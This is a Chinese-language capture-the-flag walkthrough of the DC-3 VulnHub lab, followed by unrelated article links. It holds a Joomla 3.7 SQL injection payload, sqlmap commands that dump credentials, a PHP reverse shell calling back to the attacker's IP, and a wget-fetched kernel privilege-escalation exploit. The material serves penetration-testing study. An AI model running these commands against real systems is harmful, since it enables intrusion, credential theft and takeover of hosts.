当前位置：首页 > news >正文

dc-3靶机渗透

news 来源：原创 2024/7/7 12:25:47

环境准备

dc-3靶机下载链接：

https://download.vulnhub.com/dc/DC-3-2.zip

启动靶机遇到的问题解决文章在下面

http://t.csdnimg.cn/zLQAI

kali最新版 dc-3靶机两台机器都在vmware上运行网络设置NAT模式

渗透过程

信息收集

首先使用ifconfig获取kali的IP地址

可以看到 kali的ip为192.168.52.129

接下来使用nmap扫描当前网段活跃主机

nmap -sn 192.168.52.0/24

这里可以看到 dc-3靶机的ip应该是192.168.52.130

继续使用nmap进行下一步的信息收集

nmap -sV -p- 192.168.52.130

进行服务的版本检测和全端口扫描

可以看到只开放了80端口

那么我们访问一下看看有什么东西

收集一下网站的指纹信息吧

我这边用的是一个火狐的插件-Wappalyzer

可以看到，这边用的是Joomiacms系统

kali上还存在一个专门针对它的漏洞扫描工具Joomscan

joomscan --url http://192.168.52.130

可以看到版本号为3.70

还发现了一个后台地址

漏洞利用

去网上搜了一下，发现3.7是存在一个注入漏洞的尝试复现

直接用的网上的payload

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select%20user())),1)%20--+

用户名爆出来了

接下来用sqlmap

sqlmap -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" --dbs

应该是joomladb这个数据库

python sqlmap.py -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D joomladb --tables

表爆的有点多呀，时间问题就不一个一个试了就是在__users表里

python sqlmap.py -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D "joomladb" -T "#__users" -C "username,password" --dump

这里解密出来是snoopy

因为我这边出了一点问题解密过程就不演示了

咱们拿着这个账号密码去登陆后台

也是成功登录进来了

反弹shell

将代码修改为反弹shell的代码

#当系统没有禁用proc_popen的时候，我们是可以借助proc_popen轻松反弹这样的一个shell的。 <?php $sock = fsockopen("192.168.52.129", "1433"); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process); ?>

然后点击save保存

然后访问index.php的同时 kali接收1433端口反弹的数据

成功接收

python -c "import pty;pty.spawn('/bin/bash')"

//使用python 弄一个交互式终端

提权

输入whoami发现是个低权限用户，想办法提权

cat /etc/*release #查看发行版信息 cat /proc/version #查看内核版本的全部信息

Ubuntu 16.04 LTS 内核为Linux 4.4.0-21

查看kali本地漏洞库里面的exp

searchsploit Ubuntu 16.04

39772.txt可以用

查看exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

最后有exp地址

在kali中开启apache

systemctl start apache2.service

移动刚刚下载的文件到指定目录

mv 39772.zip /var/www/html

文件下载链接为 http://192.168.52.129/39772.zip

在dc-3的shell中下载该文件

wget http://192.168.52.129/39772.zip

解压exp文件

unzip 39772.zip #解压39772.zip cd 39772 #进入39772 tar -xvf exploit.tar #解压缩exploit.tar

进入 ebpf_mapfd_doubleput_exploit 运行exp

cd ebpf_mapfd_doubleput_exploit

运行方法

./compile.sh ./doubleput

找寻flag

相关文章：

014-GeoGebra基础篇-快速解决滑动条的角度无法输入问题

如何通过IP地址查询地理位置及运营商信息

Elasticsearch exists 和 missing 查询：检查字段是否存在或缺失

webpack 之 splitChunks分包策略

Pixi.js 使用指南

【应届应知应会】SQL常用知识点50道

桂花网蓝牙网关X1000：引领物联网新时代的智能连接

chrome.storage.local.set 未生效

Postman 拦截器：掌握网络请求与响应的调试技巧

华为仓颉编程语言正式发布，仓颉编程教程

eNSP-VLAN虚拟局域网

Werkzeug库介绍:Python WSGI工具集

数据开发人员如何真正理解业务、并构建业务模型？

百日筑基第十一天

【Linux进阶】文件和目录的默认权限与隐藏权限

《微软的软件测试之道》成书始末、出版宣告、补充致谢名单及相关信息

4. 路由到控制器 - Laravel从零开始教程

Akka系列（七）：Actor持久化之Akka persistence

Android 初级面试者拾遗（前台界面篇）之 Activity 和 Fragment

Essential Studio for ASP.NET Web Forms 2017 v2，新增自定义树形网格工具栏

Eureka 2.0 开源流产，真的对你影响很大吗？

Java精华积累：初学者都应该搞懂的问题

Python学习笔记字符串拼接

Python学习之路16-使用API

Travix是如何部署应用程序到Kubernetes上的

⭐ Unity 开发bug —— 打包后shader失效或者bug (我这里用Shader做两张图片的合并发现了问题)

vue和cordova项目整合打包，并实现vue调用android的相机的demo

百度小程序遇到的问题

机器人定位导航技术激光SLAM与视觉SLAM谁更胜一筹？

前端性能优化--懒加载和预加载

三栏布局总结

携程小程序初体验

移动互联网+智能运营体系搭建=你家有金矿啊！

再谈express与koa的对比

#每天一道面试题# 什么是MySQL的回表查询

#在 README.md 中生成项目目录结构

#职场发展#其他

$LayoutParams cannot be cast to android.widget.RelativeLayout$LayoutParams

（16）Reactor的测试——响应式Spring的道法术器

（1综述）从零开始的嵌入式图像图像处理(PI+QT+OpenCV)实战演练

（ｃ语言）strcpy函数用法

（C语言）编写程序将一个4×4的数组进行顺时针旋转90度后输出。

(java)关于Thread的挂起和恢复

(LeetCode) T14. Longest Common Prefix

（Matalb分类预测）GA-BP遗传算法优化BP神经网络的多维分类预测

（react踩过的坑）Antd Select（设置了labelInValue）在FormItem中initialValue的问题

(附源码)springboot宠物医疗服务网站毕业设计688413

(附源码)ssm教师工作量核算统计系统毕业设计 162307

(附源码)计算机毕业设计ssm基于Internet快递柜管理系统

（十五）devops持续集成开发——jenkins流水线构建策略配置及触发器的使用

（一）项目实践-利用Appdesigner制作目标跟踪仿真软件

.MSSQLSERVER 导入导出命令集－－堪称经典，值得借鉴！

.Net 应用中使用dot trace进行性能诊断

.NET连接数据库方式

@javax.ws.rs Webservice注解